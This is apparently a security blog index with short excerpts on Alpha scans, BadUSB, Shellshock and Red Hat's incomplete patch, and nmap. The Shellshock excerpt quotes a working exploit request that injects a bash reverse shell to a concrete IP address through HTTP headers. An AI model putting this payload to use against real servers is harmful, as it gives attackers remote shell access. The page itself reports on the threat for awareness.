Why perform Alpha Scans on a regular basis?

People are always asking me – “Why should I have you run an Alpha scan for me?” Because a hacker may have been there already – not a “good” ethical hacker, but the Black hat  variety: As the Internet Storm Center discusses today: the Infosec community forum post  There are certain ports that should not … Read more

BadUSB is a hack attacking USB controllers everywhere.

What is this BadUSB? Extremetech.com has  a story  and the Youtube video from BlackHat 2014(not Derbycon as in article) The controller can be hacked and code inserted inside the USB chips themselves. So we have to create good security policies and reduce the chance of plugging in USB devices that we do not know about. … Read more

Another Hacker shows how to hack Bash Shellcode

Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”;   which as it is explained in the link (by the hacker) is to run a … Read more

RedHat still vulnerable to Bash shellcode

RedHat customer portal Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no … Read more

Nmap an excellent tool for scanning

nmap.org  has some info, but we also review sites with insight into scanning.    Nmap is short for Network Mapper. Ethical hacking – Penetration Testing  By Bhargav Tandel Nix Craft  also a good site about nmap insights  NixCraft is an online community of new and seasoned Linux / Unix sysadmins who want to make the … Read more